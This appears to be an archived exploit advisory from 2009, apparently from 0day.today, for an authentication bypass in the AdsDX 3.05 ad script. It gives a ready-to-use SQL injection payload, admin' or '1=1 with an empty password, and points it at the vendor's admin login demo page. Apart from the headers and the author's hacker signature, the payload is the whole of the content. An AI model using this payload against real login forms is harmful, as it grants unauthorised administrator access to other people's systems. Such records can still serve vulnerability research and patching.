id: 5771
date: 09/15/2009
title: AdsDX 3.05 (Auth Bypass) Remote SQL Injection Vulnerability
author: Snakespc
cves: 

===========================================================
AdsDX 3.05 (Auth Bypass) Remote SQL Injection Vulnerability
===========================================================


#--------------------------------------------------------
#AdsDX v3.05 (Auth Bypass) Remote Sql Injection
#--------------------------------------------------------
#Discovered By: Snakespc     ALGERIAN HaCkEr    
#-------------------------------------------------------
#
#Script:AdsDX v3.05
#
#http://www.adsdx.com
#--------------------------------------------------------
#Exploit:
#--------
#Demo:http://adsdx.com/demo/admin/index.php
#Username:admin' or '1=1 
#Password: No Thing !!!!



#  0day.today [2023-03-21]  #